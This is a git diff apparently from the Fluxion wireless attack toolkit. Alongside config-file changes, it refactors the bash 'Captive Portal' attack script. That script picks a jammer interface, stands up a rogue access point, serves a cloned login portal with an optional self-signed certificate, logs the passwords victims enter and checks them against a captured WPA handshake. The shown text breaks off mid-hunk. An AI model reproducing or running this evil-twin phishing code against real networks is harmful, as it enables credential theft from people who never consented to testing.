diff --git a/.editorconfig b/.editorconfig index 28ee5a7..0b79d02 100644 --- a/.editorconfig +++ b/.editorconfig @@ -6,13 +6,13 @@ insert_final_newline = true max_line_length=120 [*.sh] -indent_style = space -indent_size = 2 +indent_style = tab +indent_size = 4 charset = utf-8 trim_trailing_whitespace = true [*.py] -indent_size=2 +indent_size = 4 [*.md] trim_trailing_whitespace = false diff --git a/.gitignore b/.gitignore index e9168d9..57c0236 100644 --- a/.gitignore +++ b/.gitignore @@ -1,35 +1,173 @@ + +# Custom files *~ *.swp *.swo *.cap *.log -BullyOutput.txt +*.conf +*.lock +*.save +*.backup -# temporary files which can be created if a process still has a handle open of a deleted file -.fuse_hidden* +# Compiled Object files +*.slo +*.lo +*.o +*.obj -# KDE directory preferences -.directory +# Precompiled Headers +*.gch +*.pch -# Linux trash folder which might appear on any partition or disk -.Trash-* +# Compiled Dynamic libraries +*.so +*.dylib +*.dll -# .nfs files are created when an open file is removed but is still being accessed -.nfs* +# Fortran module files +*.mod +*.smod -# Cache files for Sublime Text +# Compiled Static libraries +*.lai +*.la +*.a +*.lib + +# Executables +*.exe +*.out +*.app + +### Calabash ### +# Calabash / Cucumber +rerun/ +reports/ +screenshots/ +screenshot*.png +test-servers/ + +# bundler +.bundle +vendor + +### Python ### +# Byte-compiled / optimized / DLL files +__pycache__/ +*.py[cod] +*$py.class + +# C extensions + +# Distribution / packaging +.Python +build/ +develop-eggs/ +dist/ +downloads/ +eggs/ +.eggs/ +lib/ +lib64/ +parts/ +sdist/ +var/ +wheels/ +*.egg-info/ +.installed.cfg +*.egg + +# PyInstaller +# Usually these files are written by a python script from a template +# before PyInstaller builds the exe, so as to inject date/other infos into it. +*.manifest +*.spec + +# Installer logs +pip-log.txt +pip-delete-this-directory.txt + +# Unit test / coverage reports +htmlcov/ +.tox/ +.coverage +.coverage.* +.cache +nosetests.xml +coverage.xml +*.cover +.hypothesis/ + +# Translations +*.mo +*.pot + +# Django stuff: +*.log +local_settings.py + +# Flask stuff: +instance/ +.webassets-cache + +# Scrapy stuff: +.scrapy + +# Sphinx documentation +docs/_build/ + +# PyBuilder +target/ + +# Jupyter Notebook +.ipynb_checkpoints + +# pyenv +.python-version + +# celery beat schedule file +celerybeat-schedule.* + +# SageMath parsed files +*.sage.py + +# Environments +.env +.venv +env/ +venv/ +ENV/ +env.bak/ +venv.bak/ + +# Spyder project settings +.spyderproject +.spyproject + +# Rope project settings +.ropeproject + +# mkdocs documentation +/site + +# mypy +.mypy_cache/ + +### SublimeText ### +# cache files for sublime text *.tmlanguage.cache *.tmPreferences.cache *.stTheme.cache -# Workspace files are user-specific +# workspace files are user-specific *.sublime-workspace -# Project files should be checked into the repository, unless a significant -# proportion of contributors will probably not be using Sublime Text +# project files should be checked into the repository, unless a significant +# proportion of contributors will probably not be using SublimeText # *.sublime-project -# SFTP configuration file +# sftp configuration file sftp-config.json # Package control specific files @@ -48,30 +186,22 @@ bh_unicode_properties.cache # https://packagecontrol.io/packages/sublime-github GitHub.sublime-settings -# General -*.DS_Store -.AppleDouble -.LSOverride +### Vim ### +# swap +.sw[a-p] +.*.sw[a-p] +# session +Session.vim +# temporary +.netrwhist +*~ +# auto-generated tag files +tags -# Icon must end with two \r -Icon - - -# Thumbnails -._* - -# Files that might appear in the root of a volume -.DocumentRevisions-V100 -.fseventsd -.Spotlight-V100 -.TemporaryItems -.Trashes -.VolumeIcon.icns -.com.apple.timemachine.donotpresent - -# Directories potentially created on remote AFP share -.AppleDB -.AppleDesktop -Network Trash Folder -Temporary Items -.apdisk +### VisualStudioCode ### +.vscode/* +!.vscode/settings.json +!.vscode/tasks.json +!.vscode/launch.json +!.vscode/extensions.json +.history \ No newline at end of file diff --git a/.gitmodules b/.gitmodules index da31889..b7adfeb 100644 --- a/.gitmodules +++ b/.gitmodules @@ -1,4 +1,3 @@ [submodule "attacks/Captive Portal/sites"] path = attacks/Captive Portal/sites - #url = git@github.com:FluxionNetwork/sites.git - url = https://github.com/FluxionNetwork/sites + url = https://github.com/FluxionNetwork/sites diff --git a/.project b/.project index a4206b7..6ab8b19 100644 --- a/.project +++ b/.project @@ -1,6 +1,6 @@ - fluxion + Fluxion diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index 1f31b2f..b7636dc 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh @@ -1,307 +1,422 @@ #!/bin/bash -############################# < Captive Portal Parameters > ############################ +# ============================================================ # +# =============== < Captive Portal Parameters > ============== # +# ============================================================ # CaptivePortalState="Not Ready" CaptivePortalPassLog="$FLUXIONPath/attacks/Captive Portal/pwdlog" CaptivePortalNetLog="$FLUXIONPath/attacks/Captive Portal/netlog" -CaptivePortalJamTime="9999999999999" -CaptivePortalAuthenticationMethods=("hash") # "wpa_supplicant") -CaptivePortalAuthenticationMethodsInfo=("(handshake file, ${CGrn}recommended$CClr)") # "(Target AP authentication, slow)") +CaptivePortalAuthenticationMethods=("hash") # "wpa_supplicant") +CaptivePortalAuthenticationMethodsInfo=( + "(handshake file, ${CGrn}recommended$CClr)" +) # "(Target AP authentication, slow)") -########################### < Virtual Network Configuration > ########################## -# To avoid collapsing with an already connected network, we'll use an uncommon network. -VIGWAddress="192.168.254.1" -VIGWNetwork=${VIGWAddress%.*} +# ============= < Virtual Network Configuration > ============ # +# To avoid collapsing with an already existing network, +# we'll use a somewhat uncommon network and server IP. +CaptivePortalGatewayAddress="192.168.254.1" +CaptivePortalGatewayNetwork=${CaptivePortalGatewayAddress%.*} -function captive_portal_run_interface() { - if [ ! "$1" ]; then return 1; fi - # Create an identifier for the access point, AP virtual interface. - local wiAccessPoint="FX${1:2}AP" +# ============================================================ # +# ============== < Captive Portal Subroutines > ============== # +# ============================================================ # +captive_portal_unset_jammer_interface() { + if [ ! "$CaptivePortalJammerInterface" ]; then return 1; fi + CaptivePortalJammerInterface="" - # Find interface's physical device. - if ! interface_physical "$1"; then - echo -e "$FLUXIONVLine $FLUXIONPhysicalWIDeviceUnknownError" - sleep 5 - return 1 - fi + # Check if we're automatically selecting the interface & skip + # this one if so to take the user back properly. + local interfacesAvailable + readarray -t interfacesAvailable < <(attack_targetting_interfaces) - local wiAccessPointDevice="$InterfacePhysical" - - # Create the new virtual interface with the generated identifier. - echo -e "$FLUXIONVLine $CaptivePortalStartingInterfaceNotice" - if ! iw phy $wiAccessPointDevice interface add $wiAccessPoint type monitor 2>$FLUXIONOutputDevice; then - echo -e "$FLUXIONVLine $CaptivePortalCannotStartInterfaceError" - sleep 5 - return 3 - fi - - echo -e "$FLUXIONVLine $CaptivePortalStartedInterfaceNotice" - sleep 3 - - CaptivePortalRunInterface="$wiAccessPoint" + if [ ${#interfacesAvailable[@]} -le 1 ]; then return 2; fi } -function captive_portal_unset_interface() { - if [ ! "$WIAccessPoint" ]; then return 1; fi +captive_portal_set_jammer_interface() { + if [ "$CaptivePortalJammerInterface" ]; then return 0; fi - if interface_is_wireless "$WIAccessPoint"; then fluxion_unset_ap_service - fi - if [ "$WIAccessPoint" = "FX${WIMonitor:2}AP" ]; then - # Remove any previously created fluxion AP interfaces. - iw dev "$WIAccessPoint" del &>$FLUXIONOutputDevice - fi - - WIAccessPoint="" -} - -function captive_portal_set_interface() { - if [ "$WIAccessPoint" ]; then return 0; fi - - captive_portal_unset_interface - - # Gather candidate interfaces. - echo -e "$FLUXIONVLine $FLUXIONFindingWINotice" - - # List of all valid network interfaces. - interface_list_real - - local ifAlternate=("$FLUXIONGeneralRepeatOption" "$FLUXIONGeneralBackOption") - local ifAlternateInfo=("" "") - local ifAlternateState=("" "") - local ifAlternateColor=("$CClr" "$CClr") - - interface_prompt "$FLUXIONVLine $CaptivePortalInterfaceQuery" InterfaceListReal[@] \ - ifAlternate[@] ifAlternateInfo[@] ifAlternateState[@] ifAlternateColor[@] - - case "$InterfacePromptIfSelected" in - "$FLUXIONGeneralBackOption") - captive_portal_unset_interface - return 1 - ;; - - # If the monitor interface is also the AP interface, - # there's no need to reserve it again, just add it. - "$WIMonitor") - if ! captive_portal_run_interface "$InterfacePromptIfSelected"; then return 1 - fi - - WIAccessPoint="$CaptivePortalRunInterface" - ;; - *) - # We'll only attempt to run wireless interfaces for now. - # The conditional below is a temporary fix for ethernet interfaces. - # TODO: Fix fluxion_run_interface to accept non-wireless interfaces. - if interface_is_wireless "$InterfacePromptIfSelected"; then - if ! fluxion_run_interface "$InterfacePromptIfSelected"; then return 2 - fi - - WIAccessPoint="$FluxionRunInterface" - else - WIAccessPoint="$InterfacePromptIfSelected" - fi - ;; - esac - - VIGW=$WIAccessPoint - VIAP=$WIAccessPoint - - # Set an AP service if the interface selected is wireless. - if interface_is_wireless "$WIAccessPoint"; then - if ! fluxion_set_ap_service; then - captive_portal_unset_interface + if [ ! "$CaptivePortalUninitializedJammerInterface" ]; then + echo "Running get jammer interface." > $FLUXIONOutputDevice + if ! fluxion_get_interface attack_targetting_interfaces \ + "$CaptivePortalJammerInterfaceQuery"; then + echo "Failed to get jammer interface" > $FLUXIONOutputDevice return 1 fi + local selectedInterface=$FluxionInterfaceSelected + else + local selectedInterface=$CaptivePortalUninitializedJammerInterface + unset CaptivePortalUninitializedJammerInterface + fi + + if ! fluxion_allocate_interface $selectedInterface; then + echo "Failed to allocate jammer interface" > $FLUXIONOutputDevice + return 2 + fi + + echo "Succeeded get jammer interface." > $FLUXIONOutputDevice + CaptivePortalJammerInterface=${FluxionInterfaces[$selectedInterface]} +} + +captive_portal_ap_interfaces() { + interface_list_all + local interface + for interface in "${InterfaceListAll[@]}"; do + if [ "$interface" = "lo" ]; then continue; fi + echo "$interface" + done +} + +captive_portal_unset_ap_interface() { + if [ ! "$CaptivePortalAccessPointInterface" ]; then return 1; fi + if [ "$CaptivePortalAccessPointInterface" = \ + "${CaptivePortalJammerInterface}v" ]; then + if ! iw dev $CaptivePortalAccessPointInterface del \ + &> $FLUXIONOutputDevice; then + fluxion_conditional_bail "Unable to remove virtual interface!" + exit 1 + fi + fi + CaptivePortalAccessPointInterface="" +} + +captive_portal_set_ap_interface() { + if [ "$CaptivePortalAccessPointInterface" ]; then return 0; fi + + if [ ! "$CaptivePortalUninitializedAccessPointInterface" ]; then + echo "Running get ap interface." > $FLUXIONOutputDevice + if ! fluxion_get_interface captive_portal_ap_interfaces \ + "$CaptivePortalAccessPointInterfaceQuery"; then + echo "Failed to get ap interface" > $FLUXIONOutputDevice + return 1 + fi + local selectedInterface=$FluxionInterfaceSelected + else + local selectedInterface=$CaptivePortalUninitializedAccessPointInterface + unset CaptivePortalUninitializedAccessPointInterface + fi + + if ! fluxion_allocate_interface $selectedInterface; then + echo "Failed to allocate ap interface" > $FLUXIONOutputDevice + return 2 + fi + + echo "Succeeded get ap interface." > $FLUXIONOutputDevice + CaptivePortalAccessPointInterface=${FluxionInterfaces[$selectedInterface]} + + # If interfaces are the same, we need an independent virtual interface. + if [ "$CaptivePortalAccessPointInterface" = \ + "$CaptivePortalJammerInterface" ]; then + # TODO: Make fluxion's interface services manage virtual interfaces. + # Have fluxion_get_interface return a virutal interface if the primary + # interface is in used by something else (virtual reservation?). + echo "Virtual interface required, attempting." > $FLUXIONOutputDevice + if ! iw dev $CaptivePortalJammerInterface interface \ + add ${CaptivePortalJammerInterface}v type monitor \ + 2> $FLUXIONOutputDevice; then + echo -e "$FLUXIONVLine $CaptivePortalCannotStartInterfaceError" + sleep 5 + return 2 + fi + echo "Virtual interface created successfully." > $FLUXIONOutputDevice + CaptivePortalAccessPointInterface=${CaptivePortalJammerInterface}v fi } -function captive_portal_unset_auth() { - if [ ! "$APRogueAuthMode" ]; then return 0; fi +function captive_portal_unset_ap_service() { + if [ ! "$CaptivePortalAPService" ]; then return 1; fi - case "$APRogueAuthMode" in - "hash") fluxion_unset_hash ;; + CaptivePortalAPService="" + + # Since we're auto-selecting when on auto, trigger undo-chain. + if [ "$FLUXIONAuto" ]; then return 2; fi + + if ! interface_is_wireless "$CaptivePortalAccessPointInterface"; then + return 3; + fi +} + +function captive_portal_set_ap_service() { + if [ "$CaptivePortalAPService" ]; then return 0; fi + if ! interface_is_wireless "$CaptivePortalAccessPointInterface"; then + return 0; + fi + + captive_portal_unset_ap_service + + if [ "$FLUXIONAuto" ]; then + CaptivePortalAPService="hostapd" + else + fluxion_header + + echo -e "$FLUXIONVLine $CaptivePortalAPServiceQuery" + echo + + fluxion_target_show + + local choices=( + "$CaptivePortalAPServiceHostapdOption" + "$CaptivePortalAPServiceAirbaseOption" + "$FLUXIONGeneralBackOption" + ) + io_query_choice "" choices[@] + + echo + + case "$IOQueryChoice" in + "$CaptivePortalAPServiceHostapdOption") + CaptivePortalAPService="hostapd" ;; + "$CaptivePortalAPServiceAirbaseOption") + CaptivePortalAPService="airbase-ng" ;; + "$FLUXIONGeneralBackOption") + return 1 + ;; + *) + fluxion_conditional_bail "Invalid AP service selected!" + return 1 + ;; + esac + fi + + # AP Service: Load the service's helper routines. + source "lib/ap/$CaptivePortalAPService.sh" +} + +captive_portal_unset_authenticator() { + if [ ! "$CaptivePortalAuthenticatorMode" ]; then return 0; fi + + case "$CaptivePortalAuthenticatorMode" in + "hash") + echo "Unset hash is done automatically." > $FLUXIONOutputDevice ;; esac - APRogueAuthMode="" + CaptivePortalAuthenticatorMode="" # If we've only got one option, then the user skipped this section # by auto-selecting that single option, so we unset the previous # phase along with this one to properly take the user back. if [ ${#CaptivePortalAuthenticationMethods[@]} -le 1 ]; then - captive_portal_unset_interface + return 1 # Trigger undo chain because it was auto-selected. fi } -function captive_portal_set_auth() { - if [ "$APRogueAuthMode" ]; then - echo "Captive Portal authentication mode is already set, skipping!" >$FLUXIONOutputDevice +captive_portal_set_authenticator() { + if [ "$CaptivePortalAuthenticatorMode" ]; then + echo "Captive Portal authentication mode is already set, skipping!" \ + > $FLUXIONOutputDevice return 0 fi - captive_portal_unset_auth + captive_portal_unset_authenticator # If we've got only one choice, auto-select it for the user. - if [ ${#CaptivePortalAuthenticationMethods[@]} -eq 1 -o \ - ${#CaptivePortalAuthenticationMethods[@]} -ge 1 -a "$FLUXIONAuto" ]; then - APRogueAuthMode="${CaptivePortalAuthenticationMethods[0]}" - echo "Auto-selected authentication method: $APRogueAuthMode" >$FLUXIONOutputDevice + if [ \ + ${#CaptivePortalAuthenticationMethods[@]} -eq 1 -o \ + ${#CaptivePortalAuthenticationMethods[@]} -ge 1 -a \ + "$FLUXIONAuto" ]; then + CaptivePortalAuthenticatorMode="${CaptivePortalAuthenticationMethods[0]}" + echo "Auto-selected auth-method: $CaptivePortalAuthenticatorMode" \ + > $FLUXIONOutputDevice else fluxion_header echo -e "$FLUXIONVLine $CaptivePortalVerificationMethodQuery" echo - fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" + fluxion_target_show - local choices=("${CaptivePortalAuthenticationMethods[@]}" "$FLUXIONGeneralBackOption") - io_query_format_fields "" "\t$CRed[$CYel%d$CRed]$CClr %b %b\n" choices[@] \ - CaptivePortalAuthenticationMethodsInfo[@] + local choices=( + "${CaptivePortalAuthenticationMethods[@]}" + "$FLUXIONGeneralBackOption" + ) + io_query_format_fields "" "\t$CRed[$CYel%d$CRed]$CClr %b %b\n" \ + choices[@] CaptivePortalAuthenticationMethodsInfo[@] echo - APRogueAuthMode="${IOQueryFormatFields[0]}" + CaptivePortalAuthenticatorMode="${IOQueryFormatFields[0]}" # If we're going back, reset everything and abort. - if [[ "$APRogueAuthMode" == "$FLUXIONGeneralBackOption" ]]; then - captive_portal_unset_auth - return 1 + if [[ \ + "$CaptivePortalAuthenticatorMode" == \ + "$FLUXIONGeneralBackOption" ]]; then + captive_portal_unset_authenticator + return -1 fi fi # Process the authentication method selected. - captive_portal_set_auth_processingResult=1 # Assume failure. - case "$APRogueAuthMode" in - "hash") - fluxion_set_hash - captive_portal_set_auth_processingResult=$? - ;; + local result=1 # Assume failure at first. + case "$CaptivePortalAuthenticatorMode" in + "hash") + # Pass default path if no path is set yet. + if [ ! "$CaptivePortalHashPath" ]; then + CaptivePortalHashPath="$FLUXIONPath/attacks/Handshake Snooper/handshakes/$FluxionTargetSSIDClean-$FluxionTargetMAC.cap" + fi + + fluxion_hash_get_path \ + "$CaptivePortalHashPath" "$FluxionTargetMAC" "$FluxionTargetSSID" + result=$? + + if [ $result -eq 0 ]; then + CaptivePortalHashPath="$FluxionHashPath" + fi + ;; esac - # Assure authentication method processing was successful, abort otherwise. - if [[ $captive_portal_set_auth_processingResult -ne 0 ]]; then - captive_portal_unset_auth + # Assure authentication method processing succeeded, abort otherwise. + if [[ $result -ne 0 ]]; then + echo "Auth-mode error code $result!" > $FLUXIONOutputPath return 1 fi } -function captive_portal_run_certificate_generator() { - xterm -bg "#000000" -fg "#CCCCCC" -title "Generating Self-Signed SSL Certificate" -e openssl req -subj '/CN=captive.router.lan/O=CaptivePortal/OU=Networking/C=US' -new -newkey rsa:2048 -days 365 -nodes -x509 -keyout "$FLUXIONWorkspacePath/server.pem" -out "$FLUXIONWorkspacePath/server.pem" # more details there https://www.openssl.org/docs/manmaster/apps/openssl.html +captive_portal_run_certificate_generator() { + xterm -bg "#000000" -fg "#CCCCCC" \ + -title "Generating Self-Signed SSL Certificate" -e openssl req \ + -subj '/CN=captive.router.lan/O=CaptivePortal/OU=Networking/C=US' \ + -new -newkey rsa:2048 -days 365 -nodes -x509 \ + -keyout "$FLUXIONWorkspacePath/server.pem" \ + -out "$FLUXIONWorkspacePath/server.pem" + # Details -> https://www.openssl.org/docs/manmaster/apps/openssl.html chmod 400 "$FLUXIONWorkspacePath/server.pem" } -function captive_portal_unset_cert() { +captive_portal_unset_certificate() { + if [ ! "$CaptivePortalSSL" ]; then return 1; fi + # WARNING: The server configuration depends on whether the certificate + # file exists and is positioned in the proper location. The check above + # could unsynchronize with the certificate file if we're not careful! sandbox_remove_workfile "$FLUXIONWorkspacePath/server.pem" CaptivePortalSSL="" + + # Since we're auto-selecting when on auto, trigger undo-chain. + if [ "$FLUXIONAuto" ]; then return 2; fi } # Create Self-Signed SSL Certificate -function captive_portal_set_cert() { +captive_portal_set_certificate() { if [ "$CaptivePortalSSL" ]; then - echo "Captive Portal SSL mode already set to $CaptivePortalSSL!" >$FLUXIONOutputDevice + echo "Captive Portal SSL mode already set to $CaptivePortalSSL!" \ + > $FLUXIONOutputDevice return 0 fi - captive_portal_unset_cert + captive_portal_unset_certificate - # Check for existance of ssl certificate within fluxion with file size > 0 - # If a certificate exists, it's user supplied (fancy), copy it to fluxspace. - if [ -f "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" -a \ - -s "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" ]; then + # Check existance of ssl certificate within fluxion with file size > 0 + # If user-supplied (fancy) certificate exists, copy it to fluxspace. + if [ \ + -f "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" -a \ + -s "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" \ + ]; then cp "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" \ "$FLUXIONWorkspacePath/server.pem" - CaptivePortalSSL="enabled" # Must be enabled if sourcing own certificate + CaptivePortalSSL="enabled" # Enabled if sourcing user certificate - echo "Captive Portal certificate was user supplied, skipping query!" >$FLUXIONOutputDevice + echo "Captive Portal certificate was user supplied, skipping query!" \ + > $FLUXIONOutputDevice return 0 fi if [ "$FLUXIONAuto" ]; then - # If cert generator fails, gtfo, something broke! - if ! captive_portal_run_certificate_generator; then - fluxion_conditional_bail "cert-gen failed!" - return 2 - fi - CaptivePortalSSL="enabled" + CaptivePortalSSL="disabled" else - local choices=("$CaptivePortalCertificateSourceGenerateOption" "$CaptivePortalCertificateSourceRescanOption" "$CaptivePortalCertificateSourceDisabledOption" "$FLUXIONGeneralBackOption") + local choices=( + "$CaptivePortalCertificateSourceGenerateOption" + "$CaptivePortalCertificateSourceRescanOption" + "$CaptivePortalCertificateSourceDisabledOption" + "$FLUXIONGeneralBackOption" + ) io_query_choice "$CaptivePortalCertificateSourceQuery" choices[@] echo case "$IOQueryChoice" in - "$CaptivePortalCertificateSourceGenerateOption") - # If cert generator fails, gtfo, something broke! - if ! captive_portal_run_certificate_generator; then - fluxion_conditional_bail "cert-gen failed!" + "$CaptivePortalCertificateSourceGenerateOption") + # If cert generator fails, gtfo, something broke! + if ! captive_portal_run_certificate_generator; then + fluxion_conditional_bail "cert-gen failed!" + return 2 + fi + CaptivePortalSSL="enabled" + ;; + + "$CaptivePortalCertificateSourceRescanOption") + captive_portal_set_certificate + return $? + ;; + + "$CaptivePortalCertificateSourceDisabledOption") + CaptivePortalSSL="disabled" + ;; + + "$FLUXIONGeneralBackOption") + return 1 + ;; + *) + fluxion_conditional_bail "Unknown cert-gen option!" return 2 - fi - CaptivePortalSSL="enabled" - ;; - - "$CaptivePortalCertificateSourceRescanOption") - captive_portal_set_cert - return $? - ;; - - "$CaptivePortalCertificateSourceDisabledOption") - captive_portal_unset_cert - CaptivePortalSSL="disabled" - ;; - - "$FLUXIONGeneralBackOption") - captive_portal_unset_cert - return 1 - ;; - *) - fluxion_conditional_bail "Unknown cert-gen option!" - return 2 - ;; + ;; esac fi } -function captive_portal_unset_conn() { +captive_portal_unset_connectivity() { + if [ ! "$CaptivePortalConnectivity" ]; then return 1; fi CaptivePortalConnectivity="" + + # Since we're auto-selecting when on auto, trigger undo-chain. + if [ "$FLUXIONAuto" ]; then return 2; fi } -function captive_portal_set_conn() { +captive_portal_set_connectivity() { if [ "$CaptivePortalConnectivity" ]; then return 0; fi - captive_portal_unset_conn + captive_portal_unset_connectivity - local choices=("$CaptivePortalConnectivityDisconnectedOption" "$CaptivePortalConnectivityEmulatedOption" "$FLUXIONGeneralBackOption") - io_query_choice "$CaptivePortalConnectivityQuery" choices[@] + if [ "$FLUXIONAuto" ]; then + CaptivePortalConnectivity="disconnected" + else + local choices=( + "$CaptivePortalConnectivityDisconnectedOption" + "$CaptivePortalConnectivityEmulatedOption" + "$FLUXIONGeneralBackOption" + ) + io_query_choice "$CaptivePortalConnectivityQuery" choices[@] - case "$IOQueryChoice" in - "$CaptivePortalConnectivityDisconnectedOption") CaptivePortalConnectivity="disconnected" ;; - "$CaptivePortalConnectivityEmulatedOption") CaptivePortalConnectivity="emulated" ;; - "$FLUXIONGeneralBackOption") - captive_portal_unset_conn - return 1 - ;; - *) - fluxion_conditional_bail "Unknown connectivity option!" - return 2 - ;; - esac -} - -function captive_portal_unset_site() { - sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal" -} - -function captive_portal_set_site() { - if [ -d "$FLUXIONWorkspacePath/captive_portal" ]; then - echo "Captive Portal site (interface) is already set, skipping!" >$FLUXIONOutputDevice - return 0 + case "$IOQueryChoice" in + "$CaptivePortalConnectivityDisconnectedOption") + CaptivePortalConnectivity="disconnected" ;; + "$CaptivePortalConnectivityEmulatedOption") + CaptivePortalConnectivity="emulated" ;; + "$FLUXIONGeneralBackOption") + return 1 + ;; + *) + fluxion_conditional_bail "Unknown connectivity option!" + return 2 + ;; + esac fi +} - captive_portal_unset_site +captive_portal_unset_user_interface() { + if [ -z "$CaptivePortalUserInterface" -o \ + ! -d "$FLUXIONPath/attacks/Captive Portal/sites/$CaptivePortalUserInterface.portal" ]; then return 1; fi + CaptivePortalUserInterface="" +} + +captive_portal_set_user_interface() { + if [ "$CaptivePortalUserInterface" != "" -a \ + -d "$FLUXIONPath/attacks/Captive Portal/sites/$CaptivePortalUserInterface.portal" ]; then return 0; fi + + captive_portal_unset_user_interface local sites=() @@ -334,7 +449,8 @@ function captive_portal_set_site() { echo - fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" + fluxion_target_show "$FluxionTargetSSID" "$FluxionTargetEncryption" \ + "$FluxionTargetChannel" "$FluxionTargetMAC" "$FluxionTargetMaker" io_query_format_fields "" "$queryFieldOptionsFormat\n" \ sitesIdentifier[@] sitesLanguage[@] @@ -346,39 +462,27 @@ function captive_portal_set_site() { local sitePath="${site}_${siteLanguage}" case "$site" in - "$CaptivePortalGenericInterfaceOption") - source "$FLUXIONPath/attacks/Captive Portal/generic/languages/$siteLanguage.lang" - captive_portal_generic - ;; - "$FLUXIONGeneralBackOption") - captive_portal_unset_site - return 1 - ;; - *) - cp -r "$FLUXIONPath/attacks/Captive Portal/sites/$sitePath.portal" \ - "$FLUXIONWorkspacePath/captive_portal" - - find "$FLUXIONWorkspacePath/captive_portal/" -type f -exec sed -i -e 's/$APTargetSSID/'"${APTargetSSID//\//\\\/}"'/g; s/$APTargetMAC/'"${APTargetMAC//\//\\\/}"'/g; s/$APTargetChannel/'"${APTargetChannel//\//\\\/}"'/g' {} \; - ;; + "$CaptivePortalGenericInterfaceOption") + source "$FLUXIONPath/attacks/Captive Portal/generic/languages/$siteLanguage.lang" + captive_portal_generic + ;; + "$FLUXIONGeneralBackOption") + captive_portal_unset_user_interface + return 1 + ;; + *) + CaptivePortalUserInterface=$sitePath + ;; esac } -function captive_portal_unset_attack() { - sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" - sandbox_remove_workfile "$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py" - sandbox_remove_workfile "$FLUXIONWorkspacePath/lighttpd.conf" - sandbox_remove_workfile "$FLUXIONWorkspacePath/dhcpd.leases" - sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal/check.php" - sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal" - # Only reset the AP if one has been defined. - if [ "$APRogueService" -a "$(type -t ap_reset)" ]; then ap_reset - fi -} - -function captive_portal_get_client_IP() { - if [ -f "$CaptivePortalPassLog/$APTargetSSIDClean-$APTargetMAC-IP.log" ]; then - MatchedClientIP=$(cat "$CaptivePortalPassLog/$APTargetSSIDClean-$APTargetMAC-IP.log" | sed '/^\s*$/d' | tail -n 1 | head -n 1) +captive_portal_get_client_IP() { + if [ -f "$CaptivePortalPassLog/$FluxionTargetSSIDClean-$FluxionTargetMAC-IP.log" ]; then + MatchedClientIP=$( + cat "$CaptivePortalPassLog/$FluxionTargetSSIDClean-$FluxionTargetMAC-IP.log" | \ + sed '/^\s*$/d' | tail -n 1 | head -n 1 + ) else MatchedClientIP="unknown" fi @@ -386,38 +490,66 @@ function captive_portal_get_client_IP() { echo $MatchedClientIP } -function captive_portal_get_IP_MAC() { - if [ -f "$CaptivePortalPassLog/$APTargetSSIDClean-$APTargetMAC-IP.log" ] && [ "$(captive_portal_get_client_IP)" != "" ] && [ -f "$FLUXIONWorkspacePath/clients.txt" ]; then - IP=$(captive_portal_get_client_IP) - MatchedClientMAC=$(cat $FLUXIONWorkspacePath/clients.txt | grep $IP | awk '{print $5}' | grep : | head -n 1 | tr [:upper:] [:lower:]) +captive_portal_get_IP_MAC() { + if [ -f "$CaptivePortalPassLog/$FluxionTargetSSIDClean-$FluxionTargetMAC-IP.log" ] && \ + [ "$(captive_portal_get_client_IP)" != "" ] && \ + [ -f "$FLUXIONWorkspacePath/clients.txt" ]; then + local IP=$(captive_portal_get_client_IP) + local MatchedClientMAC=$( + cat $FLUXIONWorkspacePath/clients.txt | \ + grep $IP | awk '{print $5}' | grep : | head -n 1 | \ + tr [:upper:] [:lower:] + ) if [ "$(echo $MatchedClientMAC | wc -m)" != "18" ]; then - MatchedClientMAC="xx:xx:xx:xx:xx:xx" + local MatchedClientMAC="xx:xx:xx:xx:xx:xx" fi else - MatchedClientMAC="unknown" + local MatchedClientMAC="unknown" fi echo $MatchedClientMAC } -function captive_portal_get_MAC_brand() { - local MACManufacturer="" +captive_portal_get_MAC_brand() { if [ $(captive_portal_get_IP_MAC) != "" ]; then - MACManufacturer=$(macchanger -l | grep "$(echo "$(captive_portal_get_IP_MAC)" | cut -d ":" -f -3)" | cut -d " " -f 5-) + local MACManufacturer=$( macchanger -l | \ + grep "$(echo "$(captive_portal_get_IP_MAC)" | cut -d ":" -f -3)" | \ + cut -d " " -f 5-) if echo "$MACManufacturer" | grep -q x; then - MACManufacturer="unknown" + local MACManufacturer="unknown" fi else - MACManufacturer="unknown" + local MACManufacturer="unknown" fi echo $MACManufacturer } -# Create different settings required for the script -function captive_portal_set_attack() { - # AP Service: Prepare service for an attack. - if [ "$APRogueService" ]; then ap_prep + +captive_portal_unset_attack() { + sandbox_remove_workfile \ + "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" + sandbox_remove_workfile \ + "$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py" + sandbox_remove_workfile "$FLUXIONWorkspacePath/lighttpd.conf" + sandbox_remove_workfile "$FLUXIONWorkspacePath/dhcpd.leases" + sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal/check.php" + sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal" + + # Only reset the AP if one has been defined. + if [ "$CaptivePortalAPService" -a "$(type -t ap_service_reset)" ]; then + ap_service_reset fi +} + +# Create different settings required for the script +captive_portal_set_attack() { + # Load and set the captive portal user interface. + cp -r "$FLUXIONPath/attacks/Captive Portal/sites/$CaptivePortalUserInterface.portal" \ + "$FLUXIONWorkspacePath/captive_portal" + + find "$FLUXIONWorkspacePath/captive_portal/" -type f -exec \ + sed -i -e 's/$APTargetSSID/'"${FluxionTargetSSID//\//\\\/}"'/g; s/$APTargetMAC/'"${FluxionTargetMAC//\//\\\/}"'/g; s/$APTargetChannel/'"${FluxionTargetChannel//\//\\\/}"'/g' {} \; + # Add the PHP authenticator scripts, used to verify # password attempts from users using the web interface. @@ -435,21 +567,35 @@ function captive_portal_set_attack() { cp -r "$FLUXIONPath/attacks/Captive Portal/lib/connectivity responses/" \ 